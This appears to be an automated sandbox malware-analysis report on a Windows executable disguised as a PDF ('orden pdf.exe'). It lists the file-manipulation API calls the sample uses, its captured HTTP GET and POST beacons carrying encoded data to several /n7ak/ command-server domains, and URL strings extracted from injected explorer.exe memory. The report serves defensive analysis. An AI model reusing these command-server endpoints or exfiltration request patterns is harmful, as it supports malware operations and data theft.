          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001C1C8A
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_001B60DD
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_001B63F9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_001BEB60
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_001B6CA9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001BF56F FindFirstFileW,FindClose,1_2_001BF56F
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_001BF5FA
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_001C1B2F
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_001C1C8A
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_001C1F94
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 4x nop then pop edi2_2_00416D4E
          Source: global trafficHTTP traffic detected: GET /n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.unbelievabowboutique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ak/?rN=MxLeMLg7J3XdambF4+q7RpqtyYrbwIYxF5p89mR13ayzWNjROKSjcDea1OeFglLEscbA&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.bepbosch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.hydrabadproperties.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.bepbosch.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.bepbosch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bepbosch.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 4e 3d 45 54 48 6b 53 75 63 2d 4a 31 62 5f 59 68 4c 49 6e 4b 54 7a 4f 66 66 4b 37 4e 7a 50 32 38 5a 33 55 35 49 59 34 45 5a 55 28 62 32 7a 48 66 6a 37 48 59 72 77 59 6a 44 43 6a 65 53 34 69 55 62 6b 73 75 65 79 31 79 76 37 74 46 44 63 73 57 67 49 44 50 43 73 61 50 74 4a 6d 4e 4c 61 36 39 35 74 37 44 58 76 38 70 78 34 6d 57 43 6a 58 6b 51 32 39 7a 43 63 66 54 4f 35 5a 4a 50 5a 4d 39 45 32 35 66 55 4b 43 41 7e 2d 68 34 54 4e 51 32 6c 36 37 6a 68 5f 79 4a 79 72 46 48 50 69 54 49 6a 46 4b 51 7a 38 71 78 38 45 68 68 46 41 33 57 5a 63 4b 72 30 6c 48 64 36 51 57 66 58 34 72 6d 4c 31 54 5a 75 5f 48 77 78 4b 45 54 51 30 53 4b 48 74 62 61 6d 37 33 34 68 30 53 48 34 6a 36 56 67 32 61 74 6b 43 7e 50 28 7a 74 76 32 2d 70 7a 63 69 79 56 64 39 35 77 73 6b 64 6a 4a 38 5a 4e 32 55 4e 52 6f 34 64 4a 34 61 62 36 71 55 51 66 70 62 51 4b 44 52 52 4d 46 6c 6f 6c 7e 2d 36 47 4c 5a 6a 31 28 75 6d 51 6c 38 6e 2d 56 5f 47 65 31 54 69 61 63 6e 64 6e 56 57 76 37 37 52 37 68 48 61 50 58 44 48 6d 5a 6d 71 37 6f 54 35 4a 5a 6f 47 36 4e 49 68 72 50 30 55 55 6d 47 64 52 73 79 49 63 51 65 4e 59 2d 37 67 71 47 41 5f 62 4e 5a 2d 45 43 37 61 28 30 4e 31 72 67 4b 37 4e 67 54 4c 74 4c 67 53 54 75 7a 72 65 6f 46 75 48 2d 49 58 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: rN=ETHkSuc-J1b_YhLInKTzOffK7NzP28Z3U5IY4EZU(b2zHfj7HYrwYjDCjeS4iUbksuey1yv7tFDcsWgIDPCsaPtJmNLa695t7DXv8px4mWCjXkQ29zCcfTO5ZJPZM9E25fUKCA~-h4TNQ2l67jh_yJyrFHPiTIjFKQz8qx8EhhFA3WZcKr0lHd6QWfX4rmL1TZu_HwxKETQ0SKHtbam734h0SH4j6Vg2atkC~P(ztv2-pzciyVd95wskdjJ8ZN2UNRo4dJ4ab6qUQfpbQKDRRMFlol~-6GLZj1(umQl8n-V_Ge1TiacndnVWv77R7hHaPXDHmZmq7oT5JZoG6NIhrP0UUmGdRsyIcQeNY-7gqGA_bNZ-EC7a(0N1rgK7NgTLtLgSTuzreoFuH-IXYw).
          Source: global trafficHTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.bepbosch.comConnection: closeContent-Length: 194340Cache-Control: no-cacheOrigin: http://www.bepbosch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bepbosch.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 4e 3d 45 54 48 6b 53 73 38 41 4b 47 33 55 4b 48 62 4c 6d 65 33 4e 45 38 47 58 77 71 4b 4c 31 72 63 4d 58 75 34 49 34 46 4a 51 6e 76 7a 30 57 73 37 37 42 62 44 7a 52 6a 44 46 71 2d 53 37 70 30 58 63 79 4a 71 36 31 7a 72 46 74 46 62 62 6c 33 51 4e 44 5f 43 64 62 76 52 31 6b 4f 32 4f 36 5f 63 46 37 6c 33 33 32 4d 70 34 69 6d 62 6c 62 68 31 6b 36 33 53 44 59 54 53 47 4a 34 6d 4e 4d 4e 6f 65 28 38 70 6e 56 77 4f 38 6d 4b 50 57 4f 6d 56 53 28 77 52 73 73 4a 6d 67 4c 68 66 78 63 50 54 42 4a 56 65 66 70 77 38 46 39 68 4e 30 39 30 42 36 61 4a 59 79 55 39 4c 68 57 65 53 46 6e 33 32 7a 5a 2d 75 33 42 42 39 73 50 43 6c 79 4f 4c 48 44 51 34 50 64 31 34 51 6b 65 6c 77 34 7e 47 6b 5a 62 66 4d 73 6b 61 71 46 68 2d 36 69 69 69 73 77 77 44 52 31 37 77 64 38 54 41 70 72 43 4d 57 4c 4d 54 45 4f 44 5a 35 4f 64 36 71 75 49 4d 42 76 55 39 62 61 48 4d 30 70 69 47 75 76 7e 58 6e 6c 6b 33 37 32 6f 52 6c 50 6d 4e 4e 6a 4e 4e 38 6b 70 62 59 75 65 56 4a 54 38 37 37 58 74 54 28 52 50 58 44 4c 6d 59 6d 41 37 5a 48 35 4a 49 49 76 36 75 67 74 28 5f 31 55 57 32 57 62 49 72 53 68 63 51 57 4e 65 63 69 50 72 78 55 5f 52 5f 52 39 46 67 54 61 7a 6b 4e 31 67 41 4c 6e 4f 54 71 45 76 34 63 58 41 49 50 4b 66 4d 5a 34 54 4e 56 54 4a 46 53 75 6e 47 62 76 65 32 30 44 6b 6c 69 57 46 6c 42 78 34 4d 6a 33 72 5a 43 6b 64 6a 6c 43 50 32 71 31 56 32 49 4a 76 68 4c 72 35 4a 68 34 47 6e 75 72 71 34 63 73 4f 4f 39 75 76 59 68 45 6d 74 36 5a 49 73 59 30 55 5a 49 71 73 54 4b 66 78 70 51 5a 4f 75 62 49 67 6b 6a 41 61 79 67 57 67 48 65 4e 34 4b 6a 39 54 45 4d 72 52 75 76 79 30 4b 49 49 76 6e 6f 61 50 50 75 53 52 61 42 37 61 58 62 58 76 36 68 4e 46 31 59 46 7a 56 6c 37 42 69 7e 61 42 4c 70 4a 52 32 73 6e 61 59 7a 68 45 30 38 66 49 70 57 51 50 4c 28 76 5a 39 33 51 5a 77 38 4c 79 64 37 41 41 57 37 43 6e 33 41 7a 65 6e 76 32 6a 70 76 70 73 55 6e 6d 45 64 6d 38 57 58 79 39 4a 66 57 5f 64 51 75 5f 65 47 68 36 76 2d 76 41 37 4c 66 43 37 2d 59 51 69 65 7a 73 32 42 65 44 38 41 37 43 6b 4b 68 43 67 2d 34 69 47 78 61 57 4b 32 30 58 43 6d 30 31 78 37 61 4b 5a 71 57 49 36 41 38 4b 61 51 61 4c 43 73 54 41 45 52 67 6e 34 42 6c 63 38 31 74 42 28 6a 4e 67 57 6a 48 76 57 37 73 73 67 78 31 68 56 78 4b 50 4d 5a 75 6f 52 4d 52 59 48 68 35 49 4b 50 79 42 45 36 56 58 41 6e 43 66 48 64 52 4a 75 39 4b 6e 50 49 43 62 62 74 4c 54 4d 6c 58 61 56 78 31 6d 7e 73 70 7a 66 68 35 46 70 4c 4e 38 6a 39 44 4e 66 54 59 49 65 67 74 6a 30 73 4c 70 70 51 58 4e 59 57 6e 73 56 34 57 59 35 6a 4c 4c 4d 64 33 39 4f 45 42 57 4d 77 70 51 57 48 47 79 67 33 59 69 53 63 72 70 41 47 65 35 52 6d 63 6a 4a 55 34 41 4c 47 54 6d 6f 73 6c 4b 55 72 75 52 54 53 43
          Source: global trafficHTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.hydrabadproperties.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.hydrabadproperties.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hydrabadproperties.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 4e 3d 49 47 4d 43 45 55 34 57 78 4b 30 47 47 67 58 33 33 55 65 77 34 4a 76 30 6a 51 65 59 49 4b 6b 66 4a 53 46 4a 78 4a 7a 6b 31 6b 38 38 79 4d 79 38 65 64 48 46 4d 76 59 50 43 4c 52 31 6f 38 66 59 53 2d 6b 74 6c 6b 69 59 64 49 42 65 65 33 4b 76 6a 63 69 4d 78 66 58 31 43 4a 6e 41 5a 52 66 5a 4a 72 51 5a 4e 45 78 4a 6e 72 30 37 4f 7a 66 43 54 30 58 69 53 39 5a 77 4d 59 6c 76 75 68 38 43 42 4a 30 41 72 37 6b 61 51 4b 68 6f 36 75 28 77 62 6b 72 41 28 69 38 54 71 57 7a 43 34 34 38 46 4e 6c 44 58 47 66 69 2d 6e 72 62 48 4a 44 38 6e 61 39 48 30 6e 45 4d 66 6f 66 34 64 7e 44 7a 63 37 47 52 54 57 76 34 32 4e 79 59 4f 4e 30 57 59 6e 37 6c 6f 4e 36 70 77 66 6f 52 48 68 55 44 41 4d 35 34 44 4a 4e 56 6a 4e 37 7e 6a 4c 64 5a 65 32 39 75 52 57 6f 6a 67 79 36 6b 31 46 6a 73 50 79 61 49 61 64 65 65 72 49 43 6b 4a 76 6c 69 59 6b 75 76 44 38 6d 67 65 65 71 67 57 4f 30 41 36 61 54 4b 6e 35 65 76 50 28 34 38 44 65 48 64 61 4c 47 49 6e 41 4f 50 6b 50 64 6f 76 38 50 30 68 4b 74 74 36 32 6c 69 62 4c 42 57 66 37 53 42 58 70 56 6d 62 69 66 6a 43 4d 77 51 5a 4d 32 59 51 77 72 51 74 41 56 45 73 39 50 39 65 4d 4b 4f 5f 63 5f 4e 37 42 61 46 50 6e 4e 56 4a 4c 6c 79 37 48 70 6f 30 47 34 4c 70 69 38 71 6b 49 77 4e 71 71 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: rN=IGMCEU4WxK0GGgX33Uew4Jv0jQeYIKkfJSFJxJzk1k88yMy8edHFMvYPCLR1o8fYS-ktlkiYdIBee3KvjciMxfX1CJnAZRfZJrQZNExJnr07OzfCT0XiS9ZwMYlvuh8CBJ0Ar7kaQKho6u(wbkrA(i8TqWzC448FNlDXGfi-nrbHJD8na9H0nEMfof4d~Dzc7GRTWv42NyYON0WYn7loN6pwfoRHhUDAM54DJNVjN7~jLdZe29uRWojgy6k1FjsPyaIadeerICkJvliYkuvD8mgeeqgWO0A6aTKn5evP(48DeHdaLGInAOPkPdov8P0hKtt62libLBWf7SBXpVmbifjCMwQZM2YQwrQtAVEs9P9eMKO_c_N7BaFPnNVJLly7Hpo0G4Lpi8qkIwNqqw).
          Source: global trafficHTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.hydrabadproperties.comConnection: closeContent-Length: 194340Cache-Control: no-cacheOrigin: http://www.hydrabadproperties.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hydrabadproperties.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 4e 3d 49 47 4d 43 45 56 77 73 7a 38 6f 54 43 53 44 36 6c 33 6d 47 7a 71 48 71 79 68 28 47 42 39 4a 73 4a 46 56 6a 78 49 43 74 39 46 73 75 68 38 69 38 59 66 76 38 41 76 59 51 4a 72 52 30 73 38 54 73 62 4e 55 6c 6c 6e 76 31 64 49 35 5a 51 56 53 6d 74 73 69 68 33 5f 62 5a 45 4a 44 62 5a 58 66 38 4a 4a 38 42 49 45 39 4a 71 5f 59 35 54 69 76 5a 51 31 62 54 4d 39 46 6f 4f 61 6c 32 75 52 52 39 42 72 49 69 73 36 34 50 48 4d 70 5a 31 4f 4f 76 4b 44 58 46 7a 53 6f 59 76 52 6a 52 32 37 5a 4d 41 45 44 6c 44 65 69 35 6c 62 43 45 4d 44 74 61 51 70 32 4b 6d 55 51 4c 6f 63 59 6a 35 31 54 33 28 48 42 74 55 65 31 64 5a 32 41 4d 43 6e 28 62 77 70 4d 65 50 37 35 50 58 4c 46 69 6c 46 76 77 41 63 6c 65 4e 63 4e 78 43 70 61 76 53 34 6c 71 31 73 71 4a 61 49 7a 50 6f 4c 74 39 4c 51 6c 43 31 59 45 33 43 75 65 49 4f 43 6b 46 67 46 79 4f 68 5a 28 49 37 56 49 38 59 61 59 50 4c 6b 73 47 57 77 28 6b 33 64 32 35 34 4d 4a 52 56 55 56 49 4a 67 6f 75 42 65 37 50 4a 64 6f 31 76 64 73 6f 4b 74 74 2d 32 67 50 4d 4d 67 43 66 37 43 67 54 70 79 37 61 6b 66 69 59 4f 6b 30 62 61 55 4d 41 77 74 34 74 42 6b 30 47 73 75 35 65 4a 5a 6d 34 66 64 6c 37 4d 4b 46 50 72 74 55 6e 59 31 61 7a 4c 4c 6f 30 44 4a 79 52 68 61 62 77 64 53 56 76 39 5a 4e 5a 6f 5f 32 76 77 33 78 4e 4b 50 7a 55 4c 6e 39 49 6b 4a 42 6c 4a 70 55 68 72 53 66 4f 72 6f 6b 43 67 32 73 6e 64 77 6b 73 6b 74 4b 6f 45 70 38 54 7e 6a 4a 7a 61 6a 34 44 56 41 33 69 37 62 36 48 65 72 48 33 71 34 61 4e 41 5f 51 37 31 36 64 43 6e 69 47 6c 30 57 6f 47 32 49 57 35 36 47 42 55 45 53 70 35 30 65 62 55 62 56 41 63 42 44 46 37 31 74 53 4a 34 62 51 4f 66 6a 52 61 4a 77 71 71 68 4e 4d 4e 38 58 78 59 6b 77 6b 41 56 64 67 51 43 79 65 6b 4a 5f 39 38 6a 66 7e 2d 69 54 65 51 55 62 72 65 42 55 61 4d 7e 2d 32 52 30 62 68 36 74 4c 58 48 52 4d 48 4c 52 71 36 57 45 6e 39 58 46 49 30 62 61 52 6e 50 6e 4e 44 36 7a 52 30 67 50 6d 73 57 33 54 63 4d 47 6d 46 7a 43 68 59 6e 78 73 79 58 78 67 74 52 7a 53 52 79 71 6e 53 65 32 44 72 4e 63 72 47 48 46 33 28 34 65 30 79 5f 73 76 6c 54 75 46 61 76 36 4c 72 53 28 38 73 4f 28 4c 52 6b 4b 47 49 57 66 4f 6d 6a 46 49 74 32 47 6d 64 79 77 53 36 5f 76 33 77 43 51 41 79 71 59 44 35 4d 61 77 41 49 6a 44 51 61 47 48 78 58 57 4b 59 4e 73 57 55 66 73 63 4c 4c 75 52 30 59 4d 66 68 4e 70 47 4e 73 37 72 46 45 44 48 58 75 7e 61 47 46 59 35 51 65 74 4b 31 4e 4d 44 34 6d 6b 73 37 48 4c 6a 4e 6f 65 69 39 73 28 57 4a 5a 58 67 56 4b 32 4d 61 63 79 70 35 53 64 43 36 4c 4b 30 49 51 35 6f 6f 42 71 46 59 78 4e 54 30 71 52 36 4c 39 37 37 62 62 6f 6e 58 6f 50 4e 43 30 69 38 45 53 36 48 75 50 53 58 4f 41 59 4f 72 6c 53
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_001C4EB5
          Source: global trafficHTTP traffic detected: GET /n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.unbelievabowboutique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ak/?rN=MxLeMLg7J3XdambF4+q7RpqtyYrbwIYxF5p89mR13ayzWNjROKSjcDea1OeFglLEscbA&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.bepbosch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.hydrabadproperties.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.unbelievabowboutique.com
          Source: unknownHTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.bepbosch.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.bepbosch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bepbosch.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 4e 3d 45 54 48 6b 53 75 63 2d 4a 31 62 5f 59 68 4c 49 6e 4b 54 7a 4f 66 66 4b 37 4e 7a 50 32 38 5a 33 55 35 49 59 34 45 5a 55 28 62 32 7a 48 66 6a 37 48 59 72 77 59 6a 44 43 6a 65 53 34 69 55 62 6b 73 75 65 79 31 79 76 37 74 46 44 63 73 57 67 49 44 50 43 73 61 50 74 4a 6d 4e 4c 61 36 39 35 74 37 44 58 76 38 70 78 34 6d 57 43 6a 58 6b 51 32 39 7a 43 63 66 54 4f 35 5a 4a 50 5a 4d 39 45 32 35 66 55 4b 43 41 7e 2d 68 34 54 4e 51 32 6c 36 37 6a 68 5f 79 4a 79 72 46 48 50 69 54 49 6a 46 4b 51 7a 38 71 78 38 45 68 68 46 41 33 57 5a 63 4b 72 30 6c 48 64 36 51 57 66 58 34 72 6d 4c 31 54 5a 75 5f 48 77 78 4b 45 54 51 30 53 4b 48 74 62 61 6d 37 33 34 68 30 53 48 34 6a 36 56 67 32 61 74 6b 43 7e 50 28 7a 74 76 32 2d 70 7a 63 69 79 56 64 39 35 77 73 6b 64 6a 4a 38 5a 4e 32 55 4e 52 6f 34 64 4a 34 61 62 36 71 55 51 66 70 62 51 4b 44 52 52 4d 46 6c 6f 6c 7e 2d 36 47 4c 5a 6a 31 28 75 6d 51 6c 38 6e 2d 56 5f 47 65 31 54 69 61 63 6e 64 6e 56 57 76 37 37 52 37 68 48 61 50 58 44 48 6d 5a 6d 71 37 6f 54 35 4a 5a 6f 47 36 4e 49 68 72 50 30 55 55 6d 47 64 52 73 79 49 63 51 65 4e 59 2d 37 67 71 47 41 5f 62 4e 5a 2d 45 43 37 61 28 30 4e 31 72 67 4b 37 4e 67 54 4c 74 4c 67 53 54 75 7a 72 65 6f 46 75 48 2d 49 58 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: rN=ETHkSuc-J1b_YhLInKTzOffK7NzP28Z3U5IY4EZU(b2zHfj7HYrwYjDCjeS4iUbksuey1yv7tFDcsWgIDPCsaPtJmNLa695t7DXv8px4mWCjXkQ29zCcfTO5ZJPZM9E25fUKCA~-h4TNQ2l67jh_yJyrFHPiTIjFKQz8qx8EhhFA3WZcKr0lHd6QWfX4rmL1TZu_HwxKETQ0SKHtbam734h0SH4j6Vg2atkC~P(ztv2-pzciyVd95wskdjJ8ZN2UNRo4dJ4ab6qUQfpbQKDRRMFlol~-6GLZj1(umQl8n-V_Ge1TiacndnVWv77R7hHaPXDHmZmq7oT5JZoG6NIhrP0UUmGdRsyIcQeNY-7gqGA_bNZ-EC7a(0N1rgK7NgTLtLgSTuzreoFuH-IXYw).
          Source: explorer.exe, 00000003.00000000.272132994.000000000F76B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.allworljob.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.allworljob.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.allworljob.com/n7ak/www.healthywithhook.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.allworljob.comReferer:
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.bepbosch.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.bepbosch.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.bepbosch.com/n7ak/www.huro14.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.bepbosch.comReferer:
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.excelcapfunding.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.excelcapfunding.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.excelcapfunding.com/n7ak/www.allworljob.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.excelcapfunding.comReferer:
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.hanaleedossmann.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.hanaleedossmann.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.hanaleedossmann.com/n7ak/www.librosdecienciaficcion.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.hanaleedossmann.comReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.healthywithhook.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.healthywithhook.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.healthywithhook.com/n7ak/www.s-immotanger.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.healthywithhook.comReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.huro14.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.huro14.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.huro14.com/n7ak/www.wwwswty6655.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.huro14.comReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.hydrabadproperties.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.hydrabadproperties.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.hydrabadproperties.com/n7ak/www.myultimateleadgenerator.com
